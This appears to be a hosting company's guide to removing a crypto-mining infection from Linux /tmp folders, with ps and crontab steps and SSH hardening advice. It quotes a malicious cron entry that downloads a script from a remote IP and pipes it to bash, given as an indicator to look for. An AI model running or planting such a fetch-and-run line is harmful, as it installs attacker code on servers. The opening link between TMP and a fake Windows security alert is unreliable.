Are you trying to get rid of malicious tmp processes or files?
This guide is for you.
TMP is an executable file downloaded and used by the virus, Fake Microsoft Security Essentials Alert. Fake Microsoft Security Essentials attempts to do this by flooding your computer with pop-up alerts telling you that your computer is infected.
Recently, one of our customers contacted us siting that there was a process showing in CPU stats that consumed around 90%.
This was a crypto miner malware and this should be deleted from the server.
Here at Ibmi Media, as part of our Server Management Services, we regularly help our Custometers to resolve Linux related errors.
In this context, we shall look into how to resolve malicious tmp processes issue.
What triggers malicious tmp processes ?
Malicious tmp processes and files are caused by the following factors:
i. A brute force attack against SSH accounts.
ii. Automated installation of a pre-compiled binary once access is obtained.
iii. Modifying the system to ensure malware persistence.
iv. Start mining cryptocurrencies on the victim’s CPU or GPU.
Mostly, this attack is not destructive. But we can't ensure what else was modified during the attack. So we have to reload the affected system completely from known good backups which wastes our time.
How to fix malicious tmp processes of files issue ?
Here, you will learn how to resolve this problem.
To begin, we check whether the process is running using the command given below:
ps aux | grep <processname>
We look at the cronjob of this user:
crontab -u username -l
If it has this string:
* * * * wget -q -O – http://192.98.132.xxy:8220/mr.sh | bash -sh > /dev/null 2>&1
Then we edit this cronjob using the below command:
crontab -e -u username
Delete the cronjob using the below command:
crontab -r -u username
Then delete the corresponding files in /var/tmp and /tmp folder:
How to prevent Cryptomining on Linux ?
To protect against these attacks, here are the different steps our Support Experts suggest to our customers.
1. Disabling all default system login accounts.
2. Disabling SSH password logins and set SSH private key authentication.
3. Enabling two-factor authentication for SSH.
4. Blocking access to all network services that do not need to be exposed to the Internet (for example, databases, control panels and SSH ports).
5. Also, make sure to monitor systems for unusual CPU, memory, disk, and network activity.
6. Use host-based intrusion detection to spot any problems that might have slipped through.